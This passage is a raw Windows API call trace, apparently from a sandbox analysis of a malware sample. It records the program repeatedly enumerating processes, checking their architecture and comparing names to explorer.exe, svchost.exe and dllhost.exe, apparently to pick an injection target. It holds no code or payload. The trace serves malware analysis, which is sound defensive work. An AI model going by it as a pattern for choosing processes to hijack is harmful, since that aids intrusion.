th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0212.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0212.629] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.629] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.629] CloseHandle (hObject=0xec) returned 1 [0212.629] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0212.629] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0212.629] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0212.629] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0212.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0212.630] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.630] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.630] CloseHandle (hObject=0xec) returned 1 [0212.630] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0212.630] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0212.630] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0212.630] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0212.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0212.631] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.631] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.631] CloseHandle (hObject=0xec) returned 1 [0212.631] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0212.631] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0212.631] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0212.631] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0212.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0212.631] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.631] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.631] CloseHandle (hObject=0xec) returned 1 [0212.631] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0212.631] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0212.631] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0212.631] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0212.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0212.632] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.632] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.632] CloseHandle (hObject=0xec) returned 1 [0212.632] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0212.632] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0212.632] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0212.632] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0212.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0212.633] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.633] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.633] CloseHandle (hObject=0xec) returned 1 [0212.633] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0212.633] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0212.633] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0212.633] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0212.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0212.633] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.633] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.633] CloseHandle (hObject=0xec) returned 1 [0212.633] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0212.634] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0212.634] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0212.634] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0212.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0212.634] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.634] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.634] CloseHandle (hObject=0xec) returned 1 [0212.634] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0212.634] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0212.634] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0212.634] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0212.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0212.635] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.635] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.635] CloseHandle (hObject=0xec) returned 1 [0212.635] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0212.635] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0212.635] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0212.635] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0212.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0212.636] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.636] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.636] CloseHandle (hObject=0xec) returned 1 [0212.636] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0212.636] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0212.636] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0212.636] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0212.636] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0212.637] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0212.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0212.637] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0212.638] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.638] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0212.638] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0212.639] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.639] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.639] CloseHandle (hObject=0xec) returned 1 [0212.639] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0212.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0212.639] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.639] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.639] CloseHandle (hObject=0xec) returned 1 [0212.639] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0212.640] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0212.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.717] CloseHandle (hObject=0xec) returned 1 [0212.717] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0212.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0212.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.717] CloseHandle (hObject=0xec) returned 1 [0212.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0212.718] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.718] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.718] CloseHandle (hObject=0xec) returned 1 [0212.719] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0212.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0212.719] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.719] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0212.719] CloseHandle (hObject=0xec) returned 1 [0212.719] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0212.719] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0212.719] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0212.719] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0212.720] CloseHandle (hObject=0xe8) returned 1 [0212.720] Sleep (dwMilliseconds=0x3e8) [0213.761] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0213.770] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0213.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0213.771] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0213.771] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0213.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0213.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0213.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0213.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0213.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0213.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0213.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0213.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0213.776] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0213.776] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0213.777] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0213.777] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0213.778] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0213.778] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0213.779] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0213.779] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0213.780] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.780] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.780] CloseHandle (hObject=0xec) returned 1 [0213.780] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0213.780] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0213.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0213.781] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.781] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0213.781] CloseHandle (hObject=0xec) returned 1 [0213.781] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0213.782] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, 